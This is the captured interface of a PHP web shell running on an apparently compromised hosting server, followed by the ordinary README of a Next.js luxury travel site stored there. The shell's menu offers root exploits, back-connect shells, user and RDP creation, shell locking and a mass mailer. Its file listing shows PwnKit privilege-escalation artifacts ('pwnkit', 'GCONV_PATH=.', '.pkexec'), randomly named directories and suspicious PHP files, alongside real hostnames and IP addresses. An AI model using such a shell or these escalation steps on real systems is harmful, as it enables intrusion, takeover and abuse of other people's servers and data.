Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.16
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltravel.net /
[ HOME SHELL ]
Name
Size
Permission
Action
.agents
[ DIR ]
drwxrwxrwx
.claude
[ DIR ]
drwxrwxrwx
.data
[ DIR ]
drwxrwxrwx
.git
[ DIR ]
drwxrwxrwx
.next
[ DIR ]
drwxrwxrwx
.pkexec
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
b1dhaig
[ DIR ]
drwxr-xr-x
cmjuk1r
[ DIR ]
drwxr-xr-x
database
[ DIR ]
drwxrwxrwx
edpgvif
[ DIR ]
drwxr-xr-x
iqocfpd
[ DIR ]
drwxr-xr-x
node_modules
[ DIR ]
drwxrwxrwx
ogifals
[ DIR ]
drwxr-xr-x
prisma
[ DIR ]
drwxrwxrwx
public
[ DIR ]
drwxrwxrwx
qynbjm1
[ DIR ]
drwxr-xr-x
signaltravel
[ DIR ]
drwxrwxrwx
src
[ DIR ]
drwxrwxrwx
svbghle
[ DIR ]
drwxr-xr-x
wgo1pqu
[ DIR ]
drwxr-xr-x
wp-content
[ DIR ]
drwxrwxrwx
wp-includes
[ DIR ]
drwxrwxrwx
.env
226
B
-rwxrwxrwx
.env.example
851
B
-rwxrwxrwx
.gitignore
515
B
-rwxrwxrwx
.htaccess
199
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
AGENTS.md
327
B
-rwxrwxrwx
CLAUDE.md
11
B
-rwxrwxrwx
Dockerfile
642
B
-rwxrwxrwx
README.md
3.43
KB
-rwxrwxrwx
buy.php
180.35
KB
-rw-r--r--
dev-server.err
0
B
-rwxrwxrwx
dev-server.log
0
B
-rwxrwxrwx
docker-compose.yml
477
B
-rwxrwxrwx
eslint.config.mjs
465
B
-rwxrwxrwx
license-nkur.php
629
B
-rw-r--r--
next-env.d.ts
247
B
-rwxrwxrwx
next.config.ts
890
B
-rwxrwxrwx
package-lock.json
301.82
KB
-rwxrwxrwx
package.json
1.08
KB
-rwxrwxrwx
postcss.config.mjs
94
B
-rwxrwxrwx
prisma.config.ts
247
B
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
tsconfig.json
670
B
-rwxrwxrwx
tsconfig.tsbuildinfo
321.68
KB
-rwxrwxrwx
unzipper.php
11.99
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
# Signal Travel Concierge An ultra-luxury travel platform: cinematic 3D homepage, interactive globe, AI trip planner, advanced booking atelier, member suite and enterprise admin console. **Stack:** Next.js 16 (App Router, Server Components) · TypeScript · Tailwind CSS 4 · Framer Motion · Three.js + React Three Fiber · Lenis smooth scroll · React Hook Form + Zod · Prisma + PostgreSQL · Docker. ## Quick start ```bash npm install npm run dev # http://localhost:3000 ``` No environment variables are required for the demo — every integration degrades gracefully: the AI concierge and trip planner run on a local composer until `OPENAI_API_KEY` is set, bookings validate and confirm without Stripe, and the newsletter accepts emails without Resend. ## Pages | Route | What it is | |---|---| | `/` | Cinematic hero with interactive 3D globe (click gold markers), luxury search, 8 animated sections | | `/destinations` | Filterable atlas with 3D-tilt floating cards | | `/destinations/[slug]` | Full destination dossier: facts, visa, safety, hotels, experiences, gallery, 360° tour hook | | `/planner` | AI Trip Planner — mood + nights + budget → day-by-day itinerary + packing list | | `/booking` | 4-step booking atelier: journey → travelers (Zod-validated) → add-ons → payment, with dynamic pricing, promo codes (`SIGNAL10`), installments, QR ticket confirmation | | `/dashboard` | Member suite: bookings, wishlist, documents, loyalty progress, 2FA settings | | `/admin` | Enterprise console: KPI cards, animated revenue chart, destination mix donut, bookings table | ## API routes - `POST /api/concierge` — AI chat (OpenAI when keyed, rule-based concierge otherwise) - `POST /api/planner` — itinerary generator - `POST /api/booking` — Zod-validated booking intake (Stripe/Resend/Twilio hooks documented inline) - `POST /api/newsletter` — subscription (Resend-ready) ## Database Full production schema in [prisma/schema.prisma](prisma/schema.prisma): users & roles, membership tiers, destinations, hotels/rooms/availability (dynamic-pricing snapshots), bookings, payments & installments, coupons, gift cards, wishlist, reviews, documents, notifications, support tickets, referrals, audit logs. ```bash docker compose up -d db redis npx prisma migrate dev ``` ## Design system - Palette: Midnight `#050505` · Royal `#0047FF` · Gold `#D4AF37` · Emerald `#00C897` · Silver `#C9CED6` - Typography: Space Grotesk (display) + Inter (body) via `next/font`. Satoshi/Clash Display can be added as local fonts (they are not on Google Fonts). - Glassmorphism utilities (`.glass`, `.glass-strong`, `.glass-reflect`), aurora backgrounds, gold shimmer text, glow buttons, 3D tilt cards, custom gold cursor, luxury preloader, Lenis smooth scroll. Dark mode is default; light mode via the navbar toggle (persisted). ## Production notes - SEO: metadata + OpenGraph + Twitter cards, Schema.org (`TravelAgency`, `TouristDestination`), dynamic `sitemap.xml`, `robots.txt`, canonical URLs. - PWA: `manifest.webmanifest` + SVG icon; add a service worker (e.g. `@serwist/next`) for offline. - Performance: Server Components by default, `next/image` AVIF/WebP, dynamic import for the Three.js bundle (never blocks first paint), lazy scroll-triggered sections. - Security: headers in `next.config.ts`, Zod on every API boundary, role enum + audit log in schema. - Deploy: `docker compose up` or Vercel. Set `output: "standalone"` in `next.config.ts` for the Docker image.
Close